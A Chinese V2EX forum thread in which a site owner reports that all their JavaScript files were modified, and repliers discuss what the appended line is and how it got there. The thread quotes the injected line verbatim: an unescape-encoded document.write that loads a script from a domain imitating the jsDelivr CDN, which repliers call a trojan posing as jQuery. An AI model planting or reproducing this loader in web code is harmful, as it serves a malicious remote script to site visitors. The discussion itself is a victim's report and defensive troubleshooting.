V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
推荐关注
Meteor
JSLint - a JavaScript code quality tool
jsFiddle
D3.js
WebStorm
推荐书目
JavaScript 权威指南第 5 版
Closure: The Definitive Guide
jalen
V2EX  ›  JavaScript

这是被挂了什么代码

  •  
  •   jalen · 2022-10-26 12:22:42 +08:00 · 4497 次点击
    这是一个创建于 784 天前的主题,其中的信息可能已经有所发展或是发生改变。
    document.write(unescape("%3Cscript src='https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js'%3E%3C/script%3E"));
    

    把加载的 js 最后全加了这个。

    17 条回复    2022-11-14 12:08:38 +08:00
    shuxhan
        1
    shuxhan  
       2022-10-26 12:28:19 +08:00
    就是给网页添加了 jquery 库的引入标签,不过这样写的话,整个页面都废了全部被覆盖。
    jalen
        2
    jalen  
    OP
       2022-10-26 12:32:26 +08:00
    @shuxhan #1 我就是被挂了木马了。 文件被修改了
    kenvix
        3
    kenvix  
       2022-10-26 12:39:00 +08:00
    打开 https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js 显然这不是正常的 jquery 而是假装 jq 的马
    jalen
        4
    jalen  
    OP
       2022-10-26 12:43:50 +08:00
    @kenvix #3 这种情况大概率是怎么植入的,我现在不知道怎么防
    illl
        5
    illl  
       2022-10-26 12:47:43 +08:00 via iPhone
    被 getshell 了吧,网站用的啥框架
    mxT52CRuqR6o5
        6
    mxT52CRuqR6o5  
       2022-10-26 12:50:36 +08:00
    那可能性可多了
    edis0n0
        7
    edis0n0  
       2022-10-26 13:17:22 +08:00
    @kenvix #3 这个伪装不太行,以前我见过的伪装 jq 的马空 referrer 的时候都能返回真 jq
    wtfedc
        8
    wtfedc  
       2022-10-26 15:24:43 +08:00   ❤️ 1
    @jalen 如果博客开了评论,检查下 xss 。不过所有页面都有加的话,估计 webshell 早拿到了
    learningman
        9
    learningman  
       2022-10-26 16:06:54 +08:00   ❤️ 1
    头一回见到 autos 这个顶级域
    wingor2015
        10
    wingor2015  
       2022-10-26 16:51:11 +08:00
    遇到过一次是服务器上的代码被加了
    jalen
        11
    jalen  
    OP
       2022-10-26 20:24:48 +08:00
    我看了自己的文件 就 js 被修改过,也没有新增文件。服务器也没被闯入的痕迹。 这攻击点会在哪里?
    hxy100
        12
    hxy100  
       2022-10-27 02:26:47 +08:00
    这个域名也很有迷惑性,仿知名 CDN 的域名 jsdelivr.com
    MEIerer
        13
    MEIerer  
       2022-10-27 09:31:03 +08:00
    我好久没中过木马了,现在装东西看见内存小的都会往哈勃测一下
    jalen
        14
    jalen  
    OP
       2022-10-27 09:49:42 +08:00
    @MEIerer #13 哈勃?什么东西
    Trient
        15
    Trient  
       2022-10-27 13:47:08 +08:00
    siwi
        16
    siwi  
       2022-11-12 17:35:01 +08:00
    找到问题所在了吗? 我也是被挂了这个链接
    jalen
        17
    jalen  
    OP
       2022-11-14 12:08:38 +08:00
    @siwi 我不知道问题出在哪里, 反正就先删了 js 。 是不是 ftp 被干了,因为服务器没看到被破。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3996 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 35ms · UTC 00:58 · PVG 08:58 · LAX 16:58 · JFK 19:58
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.